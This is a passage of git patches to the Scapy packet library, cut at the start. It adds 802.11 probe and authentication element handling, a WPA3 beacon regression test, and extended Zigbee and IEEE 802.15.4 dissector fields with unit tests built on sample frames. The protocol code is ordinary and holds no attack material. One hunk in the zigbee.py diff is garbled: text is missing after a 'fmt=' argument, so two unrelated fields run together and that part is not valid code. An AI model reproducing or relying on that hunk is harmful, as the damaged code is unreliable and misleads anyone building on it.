Dot11ReassoReq(_Dot11EltUtils): name = "802.11 Reassociation Request" fields_desc = [FlagsField("cap", 0, 16, capability_list), LEShortField("listen_interval", 0x00c8), @@ -970,15 +1015,18 @@ class Dot11ReassoResp(Dot11AssoResp): name = "802.11 Reassociation Response" -class Dot11ProbeReq(Packet): +class Dot11ProbeReq(_Dot11EltUtils): name = "802.11 Probe Request" -class Dot11ProbeResp(_Dot11NetStats): +class Dot11ProbeResp(_Dot11EltUtils): name = "802.11 Probe Response" + fields_desc = [LELongField("timestamp", 0), + LEShortField("beacon_interval", 0x0064), + FlagsField("cap", 0, 16, capability_list)] -class Dot11Auth(Packet): +class Dot11Auth(_Dot11EltUtils): name = "802.11 Authentication" fields_desc = [LEShortEnumField("algo", 0, ["open", "sharedkey"]), LEShortField("seqnum", 0), diff --git a/test/regression.uts b/test/regression.uts index 380b3e44c8e..2e82c9f4a24 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12039,6 +12039,18 @@ assert nstats == { 'country_desc_type': 'Indoor' } +data = b'\x00\x00\x16\x00\x0f\x00\x00\x00|P\xb1\x82\xae\x86\x05\x00\x00\x02l\t\xa0\x00\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff\x02\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00:Q\xb1\x82\xae\x86\x05\x00d\x00\x11\x04\x00\x0cWPA3-Network\x01\x08\x82\x84\x8b\x96\x0c\x12\x18$\x03\x01\x01\x05\x04\x00\x02\x00\x00*\x01\x042\x040H`l0\x14\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x08\xc0\x00;\x02Q\x00\x7f\x08\x04\x00\x00\x00\x00\x00\x00@' +pkt = RadioTap(data) +nstats = pkt[Dot11Beacon].network_stats() +nstats +assert nstats == { + 'ssid': 'WPA3-Network', + 'rates': [130, 132, 139, 150, 12, 18, 24, 36], + 'channel': 1, + 'crypto': {'WPA3/SAE'} +} + + = Dot11EltCountry dissection data = b"\x00\x00&\x00/@\x00\xa0 \x08\x00\xa0 \x08\x00\x00R\xa9[#\x00\x00\x00\x00\x10\x18\x85\t\xc0\x00\xc8\x00\x00\x00\xc3\x00\xc7\x01P\x080\x00V\x9cm\xf4\xb1\xe9\xa0\xcf[\xfb%0\xa0\xcf[\xfb%0\xa0R&\x1a@\xc2\x06\x03\x00\x00f\x00!\x14\x00\x1eDisney Convention Center Guest\x01\x07\x12\x98$0H`l\x03\x01\x06\x07\x06US \x01\x0b\x1e\x0b\x05\n\x00\x8a\x8d[ \x01\x03*\x01\x00-\x1a,\x18\x1b\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x006\x03*L\x01=\x16\x06\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00F\x05s\xc0\x00\x00\x00\x7f\x06\x00\x10\x00\x04\x01@\x85\x1e\x10\x00\x8f\x00\x0f\x00\xff\x03Y\x001617-AP33-SorcA\x00\n\x00\x00:\x96\x06\x00@\x96\x00\x0b\x00\xdd\x18\x00P\xf2\x02\x01\x01\x80\x00\x03\xa4\x00\x00'\xa4\x00\x00BC^\x00b2/\x00\xdd\x06\x00@\x96\x01\x01\x04\xdd\x05\x00@\x96\x03\x05\xdd\x05\x00@\x96\x0bI\xdd\x05\x00@\x96\x14\x00dZ\x97\xbf" From a3d691f5b7f51bfc5248e4b6fbb40c77139f26c3 Mon Sep 17 00:00:00 2001 From: Dimitrios-Georgios Akestoridis Date: Wed, 20 May 2020 03:27:15 -0700 Subject: [PATCH 0167/1632] Enhancements for the zigbee and dot15d4 layers (#2647) * Enhance the dot15d4 layer * Enhance the zigbee layer * Delete a conditional field from the zigbee layer * Add unit tests for the zigbee and dot15d4 layers * Fix flake8 tests and update the header of the zigbee layer --- scapy/layers/dot15d4.py | 27 +++- scapy/layers/zigbee.py | 262 ++++++++++++++++++++++++++++++++------ test/dot15d4.uts | 271 +++++++++++++++++++++++++++++++++++++++- 3 files changed, 518 insertions(+), 42 deletions(-) diff --git a/scapy/layers/dot15d4.py b/scapy/layers/dot15d4.py index 8e111b6dc83..40ecf2bf98c 100644 --- a/scapy/layers/dot15d4.py +++ b/scapy/layers/dot15d4.py @@ -4,6 +4,7 @@ # Copyright (C) Ryan Speers 2011-2012 # Copyright (C) Roger Meyer : 2012-03-10 Added frames # Copyright (C) Gabriel Potter : 2018 +# Copyright (C) 2020 Dimitrios-Georgios Akestoridis # This program is published under a GPLv2 license """ @@ -20,7 +21,7 @@ from scapy.packet import Packet, bind_layers from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ ConditionalField, Field, LELongField, PacketField, XByteField, \ - XLEIntField, XLEShortField, FCSField, Emph + XLEIntField, XLEShortField, FCSField, Emph, FieldListField # Fields # @@ -274,12 +275,17 @@ class Dot15d4Beacon(Packet): # Pending Address Fields: # Pending Address Specification (1 byte) - BitField("pa_num_short", 0, 3), # number of short addresses pending BitField("pa_reserved_1", 0, 1), BitField("pa_num_long", 0, 3), # number of long addresses pending BitField("pa_reserved_2", 0, 1), + BitField("pa_num_short", 0, 3), # number of short addresses pending # Address List (var length) - # TODO add a FieldListField of the pending short addresses, followed by the pending long addresses, with max 7 addresses # noqa: E501 + FieldListField("pa_short_addresses", [], + XLEShortField("", 0x0000), + count_from=lambda pkt: pkt.pa_num_short), + FieldListField("pa_long_addresses", [], + dot15d4AddressField("", 0, adjust=lambda pkt, x: 8), + count_from=lambda pkt: pkt.pa_num_long), # TODO beacon payload ] @@ -347,13 +353,24 @@ class Dot15d4CmdCoordRealign(Packet): ByteField("channel", 0), # Short Address (2 octets) XLEShortField("dev_address", 0xFFFF), - # Channel page (0/1 octet) TODO optional - # ByteField("channel_page", 0), ] def mysummary(self): return self.sprintf("802.15.4 Coordinator Realign Payload ( PAN ID: %Dot15dCmdCoordRealign.pan_id% : channel %Dot15d4CmdCoordRealign.channel% )") # noqa: E501 + def guess_payload_class(self, payload): + if len(payload) == 1: + return Dot15d4CmdCoordRealignPage + else: + return Packet.guess_payload_class(self, payload) + + +class Dot15d4CmdCoordRealignPage(Packet): + name = "802.15.4 Coordinator Realign Page" + fields_desc = [ + ByteField("channel_page", 0), + ] + # Utility Functions # diff --git a/scapy/layers/zigbee.py b/scapy/layers/zigbee.py index 4db2a5de6da..3f7c4e35987 100644 --- a/scapy/layers/zigbee.py +++ b/scapy/layers/zigbee.py @@ -4,7 +4,7 @@ # Copyright (C) Ryan Speers 2011-2012 # Copyright (C) Roger Meyer : 2012-03-10 Added frames # Copyright (C) Gabriel Potter : 2018 -# Intern at INRIA Grand Nancy Est +# Copyright (C) 2020 Dimitrios-Georgios Akestoridis # This program is published under a GPLv2 license """ @@ -277,6 +277,7 @@ def guess_payload_class(self, payload): class LinkStatusEntry(Packet): name = "ZigBee Link Status Entry" + fields_desc = [ # Neighbor network address (2 octets) XLEShortField("neighbor_network_address", 0x0000), @@ -287,6 +288,9 @@ class LinkStatusEntry(Packet): BitField("incoming_cost", 0, 3), ] + def extract_padding(self, p): + return b"", p + class ZigbeeNWKCommandPayload(Packet): name = "Zigbee Network Layer Command Payload" @@ -301,8 +305,10 @@ class ZigbeeNWKCommandPayload(Packet): 7: "rejoin response", 8: "link status", 9: "network report", - 10: "network update" - # 0x0b - 0xff reserved + 10: "network update", + 11: "end device timeout request", + 12: "end device timeout response" + # 0x0d - 0xff reserved }), # - Route Request Command - # @@ -453,6 +459,51 @@ class ZigbeeNWKCommandPayload(Packet): ConditionalField(XLEShortField("new_PAN_ID", 0x0000), lambda pkt: (pkt.cmd_identifier == 10 and pkt.update_command_identifier == 0)), # noqa: E501 + # - End Device Timeout Request Command - # + # Requested Timeout (1 octet) + ConditionalField( + ByteEnumField("req_timeout", 3, { + 0: "10 seconds", + 1: "2 minutes", + 2: "4 minutes", + 3: "8 minutes", + 4: "16 minutes", + 5: "32 minutes", + 6: "64 minutes", + 7: "128 minutes", + 8: "256 minutes", + 9: "512 minutes", + 10: "1024 minutes", + 11: "2048 minutes", + 12: "4096 minutes", + 13: "8192 minutes", + 14: "16384 minutes" + }), + lambda pkt: pkt.cmd_identifier == 11), + # End Device Configuration (1 octet) + ConditionalField( + ByteField("ed_conf", 0), + lambda pkt: pkt.cmd_identifier == 11), + + # - End Device Timeout Response Command - # + # Status (1 octet) + ConditionalField( + ByteEnumField("status", 0, { + 0: "Success", + 1: "Incorrect Value" + }), + lambda pkt: pkt.cmd_identifier == 12), + # Parent Information (1 octet) + ConditionalField( + BitField("reserved", 0, 6), + lambda pkt: pkt.cmd_identifier == 12), + ConditionalField( + BitField("ed_timeout_req_keepalive", 0, 1), + lambda pkt: pkt.cmd_identifier == 12), + ConditionalField( + BitField("mac_data_poll_keepalive", 0, 1), + lambda pkt: pkt.cmd_identifier == 12) + # StrField("data", ""), ] @@ -530,7 +581,7 @@ class ZigbeeAppDataPayload(Packet): fields_desc = [ # Frame control (1 octet) FlagsField("frame_control", 2, 4, - ['reserved1', 'security', 'ack_req', 'extended_hdr']), + ['ack_format', 'security', 'ack_req', 'extended_hdr']), BitEnumField("delivery_mode", 0, 2, {0: 'unicast', 1: 'indirect', 2: 'broadcast', 3: 'group_addressing'}), @@ -539,24 +590,37 @@ class ZigbeeAppDataPayload(Packet): # Destination endpoint (0/1 octet) ConditionalField( ByteField("dst_endpoint", 10), - lambda pkt: (pkt.frame_control.ack_req or pkt.aps_frametype == 2) + lambda pkt: ((pkt.aps_frametype == 0 and + pkt.delivery_mode in [0, 2]) or + (pkt.aps_frametype == 2 and not + pkt.frame_control.ack_format)) + ), + # Group address (0/2 octets) + ConditionalField( + XLEShortField("group_addr", 0x0000), + lambda pkt: (pkt.aps_frametype == 0 and pkt.delivery_mode == 3) ), - # Group address (0/2 octets) TODO # Cluster identifier (0/2 octets) ConditionalField( # unsigned short (little-endian) EnumField("cluster", 0, _zcl_cluster_identifier, fmt=" 9)) + lambda pkt: (pkt.cmd_identifier >= 10 and + pkt.cmd_identifier <= 13)), + # Tunnel Command + ConditionalField( + dot15d4AddressField("dest_addr", 0, adjust=lambda pkt, x: 8), + lambda pkt: pkt.cmd_identifier == 14), + ConditionalField( + FlagsField("frame_control", 2, 4, [ + "ack_format", + "security", + "ack_req", + "extended_hdr" + ]), + lambda pkt: pkt.cmd_identifier == 14), + ConditionalField( + BitEnumField("delivery_mode", 0, 2, { + 0: "unicast", + 1: "indirect", + 2: "broadcast", + 3: "group_addressing" + }), + lambda pkt: pkt.cmd_identifier == 14), + ConditionalField( + BitEnumField("aps_frametype", 1, 2, { + 0: "data", + 1: "command", + 2: "ack" + }), + lambda pkt: pkt.cmd_identifier == 14), + ConditionalField( + ByteField("counter", 0), + lambda pkt: pkt.cmd_identifier == 14), + # Verify-Key Command + ConditionalField( + ByteEnumField("key_type", 0, _TransportKeyKeyTypes), + lambda pkt: pkt.cmd_identifier == 15), + ConditionalField( + dot15d4AddressField("address", 0, adjust=lambda pkt, x: 8), + lambda pkt: pkt.cmd_identifier == 15), + ConditionalField( + StrFixedLenField("key_hash", None, 16), + lambda pkt: pkt.cmd_identifier == 15), + # Confirm-Key Command + ConditionalField( + ByteEnumField("status", 0, _ApsStatusValues), + lambda pkt: pkt.cmd_identifier == 16), + ConditionalField( + ByteEnumField("key_type", 0, _TransportKeyKeyTypes), + lambda pkt: pkt.cmd_identifier == 16), + ConditionalField( + dot15d4AddressField("address", 0, adjust=lambda pkt, x: 8), + lambda pkt: pkt.cmd_identifier == 16) ] + def guess_payload_class(self, payload): + if self.cmd_identifier == 14: + # Tunneled APS Auxiliary Header + return ZigbeeSecurityHeader + else: + return Packet.guess_payload_class(self, payload) + class ZigBeeBeacon(Packet): name = "ZigBee Beacon Payload" @@ -733,6 +911,20 @@ class ZigbeeAppDataPayloadStub(Packet): ), ] + +# Zigbee Device Profile # + + +class ZigbeeDeviceProfile(Packet): + name = "Zigbee Device Profile (ZDP) Frame" + fields_desc = [ + # Transaction Sequence Number (1 octet) + ByteField("trans_seqnum", 0), + + # TODO: Transaction Data (variable) + ] + + # ZigBee Cluster Library # diff --git a/test/dot15d4.uts b/test/dot15d4.uts index 518b35271a2..e79e599087f 100644 --- a/test/dot15d4.uts +++ b/test/dot15d4.uts @@ -9,7 +9,7 @@ = Dot15D4 layers # a crazy packet with all classes in it! -pkt = Dot15d4()/Dot15d4Ack()/Dot15d4AuxSecurityHeader()/Dot15d4Beacon()/Dot15d4Cmd()/Dot15d4CmdAssocReq()/Dot15d4CmdAssocResp()/Dot15d4CmdCoordRealign()/Dot15d4CmdDisassociation()/Dot15d4CmdGTSReq()/Dot15d4Data()/Dot15d4FCS() +pkt = Dot15d4()/Dot15d4Ack()/Dot15d4AuxSecurityHeader()/Dot15d4Beacon()/Dot15d4Cmd()/Dot15d4CmdAssocReq()/Dot15d4CmdAssocResp()/Dot15d4CmdCoordRealign()/Dot15d4CmdCoordRealignPage()/Dot15d4CmdDisassociation()/Dot15d4CmdGTSReq()/Dot15d4Data()/Dot15d4FCS() assert Dot15d4 in pkt.layers() assert Dot15d4Ack in pkt.layers() assert Dot15d4AuxSecurityHeader in pkt.layers() @@ -18,6 +18,7 @@ assert Dot15d4Cmd in pkt.layers() assert Dot15d4CmdAssocReq in pkt.layers() assert Dot15d4CmdAssocResp in pkt.layers() assert Dot15d4CmdCoordRealign in pkt.layers() +assert Dot15d4CmdCoordRealignPage in pkt.layers() assert Dot15d4CmdDisassociation in pkt.layers() assert Dot15d4CmdGTSReq in pkt.layers() assert Dot15d4Data in pkt.layers() @@ -28,6 +29,126 @@ assert Dot15d4FCS in pkt.layers() pkt = Ether()/IP()/Dot15d4FCS() assert pkt[Dot15d4] += Dot15d4FCS - Beacon (without pending addresses) + +pkt = Dot15d4FCS(b'\x00\x80\x89\xaa\x99\x00\x00\xff\xcf\x00\x00\x00"\x84\xfe\xca\xef\xbe\xed\xfe\xce\xfa\xff\xff\xff\x00X\xa4') +assert Dot15d4FCS in pkt.layers() +assert pkt[Dot15d4FCS].fcf_frametype == 0 +assert pkt[Dot15d4FCS].fcf_security == False +assert pkt[Dot15d4FCS].fcf_pending == False +assert pkt[Dot15d4FCS].fcf_ackreq == False +assert pkt[Dot15d4FCS].fcf_panidcompress == False +assert pkt[Dot15d4FCS].fcf_destaddrmode == 0 +assert pkt[Dot15d4FCS].fcf_framever == 0 +assert pkt[Dot15d4FCS].fcf_srcaddrmode == 2 +assert pkt[Dot15d4FCS].seqnum == 137 +assert Dot15d4Beacon in pkt.layers() +assert pkt[Dot15d4Beacon].src_panid == 0x99aa +assert pkt[Dot15d4Beacon].src_addr == 0x0000 +assert pkt[Dot15d4Beacon].sf_beaconorder == 15 +assert pkt[Dot15d4Beacon].sf_sforder == 15 +assert pkt[Dot15d4Beacon].sf_finalcapslot == 15 +assert pkt[Dot15d4Beacon].sf_battlifeextend == False +assert pkt[Dot15d4Beacon].sf_pancoord == True +assert pkt[Dot15d4Beacon].sf_assocpermit == True +assert pkt[Dot15d4Beacon].gts_spec_permit == False +assert pkt[Dot15d4Beacon].gts_spec_reserved == 0 +assert pkt[Dot15d4Beacon].gts_spec_desccount == 0 +assert pkt[Dot15d4Beacon].pa_num_short == 0 +assert pkt[Dot15d4Beacon].pa_num_long == 0 +assert pkt[Dot15d4Beacon].pa_short_addresses == [] +assert pkt[Dot15d4Beacon].pa_long_addresses == [] +assert raw(pkt[Dot15d4Beacon].payload) == b'\x00"\x84\xfe\xca\xef\xbe\xed\xfe\xce\xfa\xff\xff\xff\x00' +assert pkt[Dot15d4FCS].fcs == 0xa458 + += Dot15d4FCS - Beacon (with pending addresses) + +pkt = Dot15d4FCS(b'\x00\x80\x89\xaa\x99\x00\x00\xff\xcf\x00\x124\x12xV\x88wfUD3"\x11\x00"\x84\xfe\xca\xef\xbe\xed\xfe\xce\xfa\xff\xff\xff\x00\x96\xd3') +assert Dot15d4FCS in pkt.layers() +assert pkt[Dot15d4FCS].fcf_frametype == 0 +assert pkt[Dot15d4FCS].fcf_security == False +assert pkt[Dot15d4FCS].fcf_pending == False +assert pkt[Dot15d4FCS].fcf_ackreq == False +assert pkt[Dot15d4FCS].fcf_panidcompress == False +assert pkt[Dot15d4FCS].fcf_destaddrmode == 0 +assert pkt[Dot15d4FCS].fcf_framever == 0 +assert pkt[Dot15d4FCS].fcf_srcaddrmode == 2 +assert pkt[Dot15d4FCS].seqnum == 137 +assert Dot15d4Beacon in pkt.layers() +assert pkt[Dot15d4Beacon].src_panid == 0x99aa +assert pkt[Dot15d4Beacon].src_addr == 0x0000 +assert pkt[Dot15d4Beacon].sf_beaconorder == 15 +assert pkt[Dot15d4Beacon].sf_sforder == 15 +assert pkt[Dot15d4Beacon].sf_finalcapslot == 15 +assert pkt[Dot15d4Beacon].sf_battlifeextend == False +assert pkt[Dot15d4Beacon].sf_pancoord == True +assert pkt[Dot15d4Beacon].sf_assocpermit == True +assert pkt[Dot15d4Beacon].gts_spec_permit == False +assert pkt[Dot15d4Beacon].gts_spec_reserved == 0 +assert pkt[Dot15d4Beacon].gts_spec_desccount == 0 +assert pkt[Dot15d4Beacon].pa_num_short == 2 +assert pkt[Dot15d4Beacon].pa_num_long == 1 +assert pkt[Dot15d4Beacon].pa_short_addresses == [0x1234, 0x5678] +assert pkt[Dot15d4Beacon].pa_long_addresses == [0x1122334455667788] +assert raw(pkt[Dot15d4Beacon].payload) == b'\x00"\x84\xfe\xca\xef\xbe\xed\xfe\xce\xfa\xff\xff\xff\x00' +assert pkt[Dot15d4FCS].fcs == 0xd396 + += Dot15d4FCS - Coordinator Realignment (without the channel page) + +pkt = Dot15d4FCS(b'#\xcc\x89\xff\xff\x88wfUD3"\x11\xaa\x99\xff\xee\xdd\xcc\xbb\xaa\x99\x88\x08\xaa\x99\xde\xc0\x14\xad\xde\\!') +assert Dot15d4FCS in pkt.layers() +assert pkt[Dot15d4FCS].fcf_frametype == 3 +assert pkt[Dot15d4FCS].fcf_security == False +assert pkt[Dot15d4FCS].fcf_pending == False +assert pkt[Dot15d4FCS].fcf_ackreq == True +assert pkt[Dot15d4FCS].fcf_panidcompress == False +assert pkt[Dot15d4FCS].fcf_destaddrmode == 3 +assert pkt[Dot15d4FCS].fcf_framever == 0 +assert pkt[Dot15d4FCS].fcf_srcaddrmode == 3 +assert pkt[Dot15d4FCS].seqnum == 137 +assert Dot15d4Cmd in pkt.layers() +assert pkt[Dot15d4Cmd].dest_panid == 0xffff +assert pkt[Dot15d4Cmd].dest_addr == 0x1122334455667788 +assert pkt[Dot15d4Cmd].src_panid == 0x99aa +assert pkt[Dot15d4Cmd].src_addr == 0x8899aabbccddeeff +assert pkt[Dot15d4Cmd].cmd_id == 0x08 +assert Dot15d4CmdCoordRealign in pkt.layers() +assert pkt[Dot15d4CmdCoordRealign].panid == 0x99aa +assert pkt[Dot15d4CmdCoordRealign].coord_address == 0xc0de +assert pkt[Dot15d4CmdCoordRealign].channel == 20 +assert pkt[Dot15d4CmdCoordRealign].dev_address == 0xdead +assert raw(pkt[Dot15d4CmdCoordRealign].payload) == b'' +assert pkt[Dot15d4FCS].fcs == 0x215c + += Dot15d4FCS - Coordinator Realignment (with the channel page) + +pkt = Dot15d4FCS(b'#\xcc\x89\xff\xff\x88wfUD3"\x11\xaa\x99\xff\xee\xdd\xcc\xbb\xaa\x99\x88\x08\xaa\x99\xde\xc0\x14\xad\xde\x00\xc8\x98') +assert Dot15d4FCS in pkt.layers() +assert pkt[Dot15d4FCS].fcf_frametype == 3 +assert pkt[Dot15d4FCS].fcf_security == False +assert pkt[Dot15d4FCS].fcf_pending == False +assert pkt[Dot15d4FCS].fcf_ackreq == True +assert pkt[Dot15d4FCS].fcf_panidcompress == False +assert pkt[Dot15d4FCS].fcf_destaddrmode == 3 +assert pkt[Dot15d4FCS].fcf_framever == 0 +assert pkt[Dot15d4FCS].fcf_srcaddrmode == 3 +assert pkt[Dot15d4FCS].seqnum == 137 +assert Dot15d4Cmd in pkt.layers() +assert pkt[Dot15d4Cmd].dest_panid == 0xffff +assert pkt[Dot15d4Cmd].dest_addr == 0x1122334455667788 +assert pkt[Dot15d4Cmd].src_panid == 0x99aa +assert pkt[Dot15d4Cmd].src_addr == 0x8899aabbccddeeff +assert pkt[Dot15d4Cmd].cmd_id == 0x08 +assert Dot15d4CmdCoordRealign in pkt.layers() +assert pkt[Dot15d4CmdCoordRealign].panid == 0x99aa +assert pkt[Dot15d4CmdCoordRealign].coord_address == 0xc0de +assert pkt[Dot15d4CmdCoordRealign].channel == 20 +assert pkt[Dot15d4CmdCoordRealign].dev_address == 0xdead +assert Dot15d4CmdCoordRealignPage in pkt.layers() +assert pkt[Dot15d4CmdCoordRealignPage].channel_page == 0 +assert raw(pkt[Dot15d4CmdCoordRealignPage].payload) == b'' +assert pkt[Dot15d4FCS].fcs == 0x98c8 + ################### #### SixLoWPAN #### ################### @@ -348,12 +469,13 @@ conf.dot15d4_protocol = "zigbee" = Zigbee - layers # a crazy packet with all classes in it! -pkt = ZigBeeBeacon()/ZigbeeAppCommandPayload()/ZigbeeAppDataPayload()/ZigbeeAppDataPayloadStub()/ZigbeeClusterLibrary()/ZigbeeNWK()/ZigbeeNWKCommandPayload()/ZigbeeNWKStub()/ZigbeeSecurityHeader() +pkt = ZigBeeBeacon()/ZigbeeAppCommandPayload()/ZigbeeAppDataPayload()/ZigbeeAppDataPayloadStub()/ZigbeeClusterLibrary()/ZigbeeDeviceProfile()/ZigbeeNWK()/ZigbeeNWKCommandPayload()/ZigbeeNWKStub()/ZigbeeSecurityHeader() assert ZigBeeBeacon in pkt.layers() assert ZigbeeAppCommandPayload in pkt.layers() assert ZigbeeAppDataPayload in pkt.layers() assert ZigbeeAppDataPayloadStub in pkt.layers() assert ZigbeeClusterLibrary in pkt.layers() +assert ZigbeeDeviceProfile in pkt.layers() assert ZigbeeNWK in pkt.layers() assert ZigbeeNWKCommandPayload in pkt.layers() assert ZigbeeNWKStub in pkt.layers() @@ -449,3 +571,148 @@ assert f.i2repr(None, v) == "00:0f:ff:00:00:41:5b:1a" assert pkt1[ZigbeeAppCommandPayload].src_addr == 18446744073709551615 f,v = pkt1[ZigbeeAppCommandPayload].getfield_and_val("src_addr") assert f.i2repr(None, v) == "ff:ff:ff:ff:ff:ff:ff:ff" + += Zigbee - Link Status + +pkt = ZigbeeNWKCommandPayload(b'\x08c\x00\x00\x11\xad\xde\x11\xde\xc0\x11') +assert ZigbeeNWKCommandPayload in pkt.layers() +assert pkt[ZigbeeNWKCommandPayload].cmd_identifier == 0x08 +assert pkt[ZigbeeNWKCommandPayload].entry_count == 3 +assert pkt[ZigbeeNWKCommandPayload].first_frame == 1 +assert pkt[ZigbeeNWKCommandPayload].last_frame == 1 +assert len(pkt[ZigbeeNWKCommandPayload].link_status_list) == 3 +assert pkt[ZigbeeNWKCommandPayload].link_status_list[0].neighbor_network_address == 0x0000 +assert pkt[ZigbeeNWKCommandPayload].link_status_list[0].incoming_cost == 1 +assert pkt[ZigbeeNWKCommandPayload].link_status_list[0].outgoing_cost == 1 +assert raw(pkt[ZigbeeNWKCommandPayload].link_status_list[0].payload) == b'' +assert pkt[ZigbeeNWKCommandPayload].link_status_list[1].neighbor_network_address == 0xdead +assert pkt[ZigbeeNWKCommandPayload].link_status_list[1].incoming_cost == 1 +assert pkt[ZigbeeNWKCommandPayload].link_status_list[1].outgoing_cost == 1 +assert raw(pkt[ZigbeeNWKCommandPayload].link_status_list[1].payload) == b'' +assert pkt[ZigbeeNWKCommandPayload].link_status_list[2].neighbor_network_address == 0xc0de +assert pkt[ZigbeeNWKCommandPayload].link_status_list[2].incoming_cost == 1 +assert pkt[ZigbeeNWKCommandPayload].link_status_list[2].outgoing_cost == 1 +assert raw(pkt[ZigbeeNWKCommandPayload].link_status_list[2].payload) == b'' +assert raw(pkt[ZigbeeNWKCommandPayload].payload) == b'' + += Zigbee - End Device Timeout Request + +pkt = ZigbeeNWKCommandPayload(b'\x0b\x03\x00') +assert ZigbeeNWKCommandPayload in pkt.layers() +assert pkt[ZigbeeNWKCommandPayload].cmd_identifier == 0x0b +assert pkt[ZigbeeNWKCommandPayload].req_timeout == 3 +assert pkt[ZigbeeNWKCommandPayload].ed_conf == 0 +assert raw(pkt[ZigbeeNWKCommandPayload].payload) == b'' + += Zigbee - End Device Timeout Response + +pkt = ZigbeeNWKCommandPayload(b'\x0c\x00\x03') +assert ZigbeeNWKCommandPayload in pkt.layers() +assert pkt[ZigbeeNWKCommandPayload].cmd_identifier == 0x0c +assert pkt[ZigbeeNWKCommandPayload].status == 0 +assert pkt[ZigbeeNWKCommandPayload].mac_data_poll_keepalive == 1 +assert pkt[ZigbeeNWKCommandPayload].ed_timeout_req_keepalive == 1 +assert raw(pkt[ZigbeeNWKCommandPayload].payload) == b'' + += Zigbee - Transport Key + +pkt = ZigbeeAppCommandPayload(b'\x05\x01\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f\x00\x88wfUD3"\x11\xff\xee\xdd\xcc\xbb\xaa\x99\x88') +assert ZigbeeAppCommandPayload in pkt.layers() +assert pkt[ZigbeeAppCommandPayload].cmd_identifier == 0x05 +assert pkt[ZigbeeAppCommandPayload].key_type == 1 +assert pkt[ZigbeeAppCommandPayload].key == b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f' +assert pkt[ZigbeeAppCommandPayload].key_seqnum == 0 +assert pkt[ZigbeeAppCommandPayload].dest_addr == 0x1122334455667788 +assert pkt[ZigbeeAppCommandPayload].src_addr == 0x8899aabbccddeeff +assert raw(pkt[ZigbeeAppCommandPayload].payload) == b'' + += Zigbee - Request Key + +pkt = ZigbeeAppCommandPayload(b'\x08\x04') +assert ZigbeeAppCommandPayload in pkt.layers() +assert pkt[ZigbeeAppCommandPayload].cmd_identifier == 0x08 +assert pkt[ZigbeeAppCommandPayload].key_type == 0x04 +assert raw(pkt[ZigbeeAppCommandPayload].payload) == b'' + += Zigbee - Tunnel + +pkt = ZigbeeAppCommandPayload(b'\x0e\x88wfUD3"\x11!\xe20\x0bP\x00\x00\xff\xee\xdd\xcc\xbb\xaa\x99\x88\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xcc\xcc\xcc\xcc') +assert ZigbeeAppCommandPayload in pkt.layers() +assert pkt[ZigbeeAppCommandPayload].cmd_identifier == 0x0e +assert pkt[ZigbeeAppCommandPayload].dest_addr == 0x1122334455667788 +assert pkt[ZigbeeAppCommandPayload].aps_frametype == 1 +assert pkt[ZigbeeAppCommandPayload].delivery_mode == 0 +assert pkt[ZigbeeAppCommandPayload].frame_control == 0b0010 +assert ZigbeeSecurityHeader in pkt.layers() +assert raw(pkt[ZigbeeSecurityHeader]) == b'0\x0bP\x00\x00\xff\xee\xdd\xcc\xbb\xaa\x99\x88\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xdd\xcc\xcc\xcc\xcc' + += Zigbee - Verify Key + +pkt = ZigbeeAppCommandPayload(b'\x0f\x04\x88wfUD3"\x11\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f') +assert ZigbeeAppCommandPayload in pkt.layers() +assert pkt[ZigbeeAppCommandPayload].cmd_identifier == 0x0f +assert pkt[ZigbeeAppCommandPayload].key_type == 0x04 +assert pkt[ZigbeeAppCommandPayload].address == 0x1122334455667788 +assert pkt[ZigbeeAppCommandPayload].key_hash == b'\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r\x0e\x0f' +assert raw(pkt[ZigbeeAppCommandPayload].payload) == b'' + += Zigbee - Confirm Key + +pkt = ZigbeeAppCommandPayload(b'\x10\x00\x04\x88wfUD3"\x11') +assert ZigbeeAppCommandPayload in pkt.layers() +assert pkt[ZigbeeAppCommandPayload].cmd_identifier == 0x10 +assert pkt[ZigbeeAppCommandPayload].status == 0 +assert pkt[ZigbeeAppCommandPayload].key_type == 0x04 +assert pkt[ZigbeeAppCommandPayload].address == 0x1122334455667788 +assert raw(pkt[ZigbeeAppCommandPayload].payload) == b'' + += Zigbee - APS acknowledgment (with the Acknowledgment Format enabled) +pkt = ZigbeeAppDataPayload(b'\x12\xa8') +assert ZigbeeAppDataPayload in pkt.layers() +assert pkt[ZigbeeAppDataPayload].aps_frametype == 2 +assert pkt[ZigbeeAppDataPayload].delivery_mode == 0 +assert pkt[ZigbeeAppDataPayload].frame_control == 0b0001 +assert pkt[ZigbeeAppDataPayload].counter == 168 +assert raw(pkt[ZigbeeAppDataPayload].payload) == b'' + += Zigbee - APS acknowledgment (with the Acknowledgment Format disabled) +pkt = ZigbeeAppDataPayload(b'\x02\x00\x02\x00\x00\x00\x00\xa6') +assert ZigbeeAppDataPayload in pkt.layers() +pkt.show() +assert pkt[ZigbeeAppDataPayload].aps_frametype == 2 +assert pkt[ZigbeeAppDataPayload].delivery_mode == 0 +assert pkt[ZigbeeAppDataPayload].frame_control == 0b0000 +assert pkt[ZigbeeAppDataPayload].dst_endpoint == 0 +assert pkt[ZigbeeAppDataPayload].cluster == 0x0002 +assert pkt[ZigbeeAppDataPayload].profile == 0x0000 